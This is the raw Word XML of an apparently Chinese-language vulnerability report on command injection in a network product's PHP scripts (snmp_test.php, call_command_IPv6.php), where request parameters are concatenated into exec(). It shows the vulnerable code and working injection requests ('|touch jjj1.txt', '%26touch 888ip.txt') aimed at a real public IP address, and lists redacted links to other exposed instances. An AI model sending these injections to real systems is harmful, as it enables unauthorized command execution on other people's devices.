              </w:rPr>
              <w:t>$file = "/tmp/snmpTest";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>if(trim($next_oid) == "" &amp;&amp; is_file($file) == true) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>unlink($file);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>test_snmp_val($ip, $read, $oid, $vlan, $next_oid);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A"/>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>function test_snmp_val($ip, $read, $oid, $vlan, $next_oid) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>if($oid == "")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$oid = "iso.3.6.1.2.1.1";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$end_oid = "iso.3.6.1.2.1.1.9.1.3.103";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get_oid_val($ip, $read, $oid, $vlan, $end_oid, "all", $next_oid);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>} else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get_oid_val($ip, $read, $oid, $vlan, $oid, "", $next_oid);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A"/>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>function get_oid_val($ip, $read, $oid, $vlan, $end_oid, $all, $next_oid="") {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>global $file;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>unset($value);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>$k = 0;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>$break = false;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>do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if($next_oid != "")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$next_oid = current(explode("=",$next_oid));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exec("/PGRAM/SNMP/bin/snmpgetnext -t 1 -r 1 -v 2c -c $read$vlan $ip $next_oid 2&gt;/dev/null ",$value);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else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exec("/PGRAM/SNMP/bin/snmpgetnext -t 1 -r 1 -v 2c -c $read$vlan $ip $oid 2&gt;/dev/null ",$value);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if($k &gt; 3)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$break = true;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:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4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}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$k++;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>}while(!$value);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>if(($all == "" &amp;&amp; stristr($next_oid, $oid) == false &amp;&amp; $next_oid != "") || ($break == true))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"null";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>} else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$id = current(explode("=",$value[0]));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if(stristr($id, $oid) == true) {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exec("/bin/echo \"".$value[0]."\" &gt;&gt; ".$file);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974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A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echo trim($value[0]);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4810679" cy="320422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704" cy="321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4A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>从这里</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>32-36</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>行可以看出，执行命令时候没有任何判断，将参数</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>switch_ip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switch_nextOid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switch_read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switch_vlan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switch_oid</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>直接拼接到</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>exec()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>函数中执行命令；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A"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”管道字符拼接命令，漏洞利用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：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞复现参数构造：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>GET /Program/Tools/snmp_test.php?switch_ip=|touch%20jjj1.txt&amp;switch_read=1&amp;switch_oid=1&amp;switch_vlan=10 HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Host: 220.163.251.198</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Accept-Encoding: gzip, deflate</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Content-Length: 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Upgrade-Insecure-Requests: 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>X-Forwarded-For: 127.0.0.1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A"/>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">https://220.163.251.198/Program/Tools/snmp_test.php?switch_ip=|touch%20jjj1.txt&amp;switch_read=1&amp;switch_oid=1&amp;switch_vlan=10 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4736928" cy="209019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5290" cy="2093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4A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A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新建文件命令，新建文本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>jjj1.txt</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00974A4A" w:rsidRDefault="00974A4A" w:rsidP="00974A4A">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4786389" cy="153790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11" cy="1542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4A4A" w:rsidRDefault="00317029" w:rsidP="00DE04D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互联网案例</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00317029" w:rsidRDefault="002E0123" w:rsidP="00317029">
            <w:hyperlink r:id="rId19" w:history="1">
              <w:r w:rsidRPr="00721CF7">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:hint="eastAsia"/>
                </w:rPr>
                <w:t>https://</w:t>
              </w:r>
              <w:r w:rsidRPr="00721CF7">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                </w:rPr>
                <w:t>................</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="00317029" w:rsidRDefault="002E0123" w:rsidP="00317029">
            <w:hyperlink r:id="rId20" w:history="1">
              <w:r w:rsidRPr="00721CF7">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:hint="eastAsia"/>
                </w:rPr>
                <w:t>https://</w:t>
              </w:r>
              <w:r w:rsidRPr="00721CF7">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                </w:rPr>
                <w:t>................</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="00317029" w:rsidRDefault="002E0123" w:rsidP="00317029">
            <w:hyperlink r:id="rId21" w:history="1">
              <w:r w:rsidRPr="00721CF7">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:hint="eastAsia"/>
                </w:rPr>
                <w:t>https://</w:t>
              </w:r>
              <w:r w:rsidRPr="00721CF7">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                </w:rPr>
                <w:t>...................</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="00317029" w:rsidRDefault="002E0123" w:rsidP="00317029">
            <w:hyperlink r:id="rId22" w:history="1">
              <w:r w:rsidRPr="00721CF7">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                  <w:rFonts w:hint="eastAsia"/>
                </w:rPr>
                <w:t>https://</w:t>
              </w:r>
              <w:r w:rsidRPr="00721CF7">
                <w:rPr>
                  <w:rStyle w:val="ad"/>
                </w:rPr>
                <w:t>.....................</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="00317029" w:rsidRPr="00317029" w:rsidRDefault="002E0123" w:rsidP="00DE04DE">
            <w:r>
              <w:t>……………….</w:t>
            </w:r>
            <w:bookmarkStart w:id="1" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="1"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004A2AA5" w:rsidRDefault="004A2AA5" w:rsidP="00566580">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="004A2AA5" w:rsidSect="00934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917" w:rsidRDefault="00F42917" w:rsidP="00566580">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00F42917" w:rsidRDefault="00F42917" w:rsidP="0056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917" w:rsidRDefault="00F42917" w:rsidP="00566580">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00F42917" w:rsidRDefault="00F42917" w:rsidP="00566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B4A20"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CFAC7A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6580"/>
    <w:rsid w:val="00010C9C"/>
    <w:rsid w:val="00067C8D"/>
    <w:rsid w:val="00114052"/>
    <w:rsid w:val="0028316F"/>
    <w:rsid w:val="002E0123"/>
    <w:rsid w:val="00317029"/>
    <w:rsid w:val="00336FA1"/>
    <w:rsid w:val="00376B7F"/>
    <w:rsid w:val="004452A5"/>
    <w:rsid w:val="0046750D"/>
    <w:rsid w:val="0048285C"/>
    <w:rsid w:val="004A2AA5"/>
    <w:rsid w:val="004A691F"/>
    <w:rsid w:val="004F1C8C"/>
    <w:rsid w:val="00507409"/>
    <w:rsid w:val="00566580"/>
    <w:rsid w:val="005B30AE"/>
    <w:rsid w:val="006D0907"/>
    <w:rsid w:val="006E02CD"/>
    <w:rsid w:val="007267D7"/>
    <w:rsid w:val="008050F1"/>
    <w:rsid w:val="00853906"/>
    <w:rsid w:val="009344C9"/>
    <w:rsid w:val="00967A44"/>
    <w:rsid w:val="00974A4A"/>
    <w:rsid w:val="00A10717"/>
    <w:rsid w:val="00A42666"/>
    <w:rsid w:val="00A56544"/>
    <w:rsid w:val="00AA220F"/>
    <w:rsid w:val="00AD1B15"/>
    <w:rsid w:val="00AD34F3"/>
    <w:rsid w:val="00BA01D1"/>
    <w:rsid w:val="00C96CC8"/>
    <w:rsid w:val="00CF209F"/>
    <w:rsid w:val="00D4792B"/>
    <w:rsid w:val="00DE04DE"/>
    <w:rsid w:val="00E32AA9"/>
    <w:rsid w:val="00ED3490"/>
    <w:rsid w:val="00F26CFF"/>
    <w:rsid w:val="00F27BF2"/>
    <w:rsid w:val="00F42917"/>
    <w:rsid w:val="00F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8F17"/>
  <w15:docId w15:val="{7BF4D6EF-661E-40CB-9CA0-6298AA3A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580"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00566580"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="a8">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="005665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6658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6580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4A691F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A691F"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ad">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A42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...................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...............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..............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20.163.251.198/Program/Tools/call_command_IPv6.php?ipv6=127.0.0.1%26touch%20888ip.txt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....................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1292</Words>
  <Characters>7370</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>61</Lines>
  <Paragraphs>17</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>XXX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morog</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>iCura</cp:lastModifiedBy>
  <cp:revision>27</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-01-08T01:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-25T05:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>